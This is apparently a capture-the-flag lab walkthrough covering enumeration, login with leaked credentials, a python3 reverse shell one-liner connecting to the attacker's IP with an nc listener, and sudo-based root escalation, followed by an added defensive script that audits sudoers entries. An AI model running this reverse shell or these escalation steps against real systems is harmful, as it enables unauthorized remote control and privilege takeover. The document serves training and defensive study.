As always, we need to enumerate the services running on the machine. Let’s start with an nmap scan of the machine.
nmap IP -sV -T4
IP: IP address of the machine
-sV: Enable service detection
-T4: Make the scan faster
$ nmap IP -sV -T4
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-27 11:17 EDT
Nmap scan report for IP
Host is up (0.39s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.24 seconds
Now we know there are 2 open ports: 22 and 80.
22 runs SSH
80 runs HTTP
Let’s visit port 80. (Webserver)
Checking the page source, we find an interesting username.
Let’s use dirsearch to find all the subdirectories.
sudo dirsearch -u http://IP -x 404,403 -t 200
-u: URL to brute
-x: Hide specific status codes
-t: Specify the number of threads
[11:27:52] 301 - 311B - /assets -> http://10.10.73.35/assets/
[11:27:53] 200 - 2KB - /assets/
[11:27:58] 200 - 1KB - /index.html
[11:28:00] 200 - 882B - /login.php
[11:28:05] 200 - 17B - /robots.txt
$ curl http://10.10.73.35/robots.txt
We find a weird text. Maybe this is a password?
Let’s try that in the
We can successfully log in using those credentials.
After logging in, we can see this page.
Let’s try to use the
ls -la command to list all the files.
We can see a lot of files. Now we can try to get a reverse shell on the machine using a python reverse shell.
Firstly let’s check if the machine has python or python3. We can check that by using
which python or
We can see that it has python3 installed. So let’s use a python3 reverse shell.
On the attacker’s machine, let’s set up a netcat listener using:
nc -lvnp 1337
You can specify any port, I like to use the port
You can find the reverse shell code here → https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
(Remember to change
python in the beginning to
python3 as the machine has
Copy that reverse shell code and use any text editor to change the IP address to your tun0 IP (
ifconfig tun0) and the port to the one you set netcat to listen on for the reverse connection. (We specified 1337.)
So the code would look like this for me (I have changed
python3, port to 1337 and IP to the IP address of my tun0 interface)
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("yourtun0ip",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Let’s paste this in the command execution panel.
Make sure to set up the listener
nc -lvnp 1337
Now let’s look at the contents of
www-data@ip-10-10-180-175:/var/www/html$ cat Sup3rS3cretPickl3Ingred.txt
mr. ........ hair
This gives us the answer to the first question: What is the first ingredient Rick needs?
Let’s look at the
www-data@ip-10-10-180-175:/var/www/html$ cat clue.txt
Look around the file system for the other ingredient.
I first went to the
/home directory where we found 2 users
Browsing in rick’s directory, we find the second ingredient.
The contents of the file answer the second question: Whats the second ingredient Rick needs?
Remember to use
"" because the name of the file is 2 words. Otherwise you will get an error.
cat "second ingredients"
www-data@ip-10-10-180-175:/home/rick$ cat "second ingredients"
cat "second ingredients"
1 ..... tear
Now for the final task.
I got a hint that the final answer is hidden in the
www-data@ip-10-10-180-175:/home/rick$ cd /root
bash: cd: /root: Permission denied
We get a permission denied error, so let’s escalate to the root user.
The most common way is to check the
sudo rights of the user using the
sudo -l command.
We can run any command with sudo. To get root user access, use
sudo su. This will give us the root shell.
Let’s browse the
/root directory and get the answer to task 3: Whats the final ingredient Rick needs?
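The escalation above works because the web server account (www-data) is allowed to run any command through sudo. As an added example (not part of the original write-up), here is a small audit that flags that kind of sudoers entry; the sample sudoers text is constructed, the NOPASSWD tag on the www-data line is an assumption because the page does not show the sudo -l output, and SERVICE_ACCOUNTS and audit_sudoers are hypothetical names.

```python
import re

# Assumed list of accounts that run network-facing services; adjust per host.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "mysql", "postgres"}

# Matches the common one-line form: who host = (runas) [TAG:] commands
SPEC = re.compile(r"^(?P<who>[%\w.-]+)\s+\S+?\s*=\s*"
                  r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$")

def audit_sudoers(text):
    """Return [(line_no, who, [reasons])] for risky user specifications."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments (and #include lines)
        m = SPEC.match(line)
        if not m or m["who"] == "Defaults" or m["who"].endswith("_Alias"):
            continue
        # Run-as users come before the optional ":group"; no (runas) means root.
        runas = m["runas"]
        users = {"root"} if runas is None else {
            u.strip() for u in runas.split(":")[0].split(",")}
        tags = set(re.findall(r"([A-Z_]+):", m["rest"]))
        cmds = [c.strip()
                for c in re.sub(r"[A-Z_]+:\s*", "", m["rest"]).split(",")]
        reasons = []
        if m["who"] in SERVICE_ACCOUNTS:
            reasons.append("service account has sudo rights")
        if users & {"root", "ALL"} and "ALL" in cmds and "NOPASSWD" in tags:
            reasons.append("any command as root without a password")
        if reasons:
            findings.append((no, m["who"], reasons))
    return findings

# Constructed sample; not taken from the target machine.
SAMPLE = """\
# constructed sudoers sample
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
"""

if __name__ == "__main__":
    for line_no, who, reasons in audit_sudoers(SAMPLE):
        print(f"line {line_no}: {who}: {'; '.join(reasons)}")
```

The parser handles only single-line user specifications and does not follow included files or expand aliases, so run it over each sudoers file on the host separately.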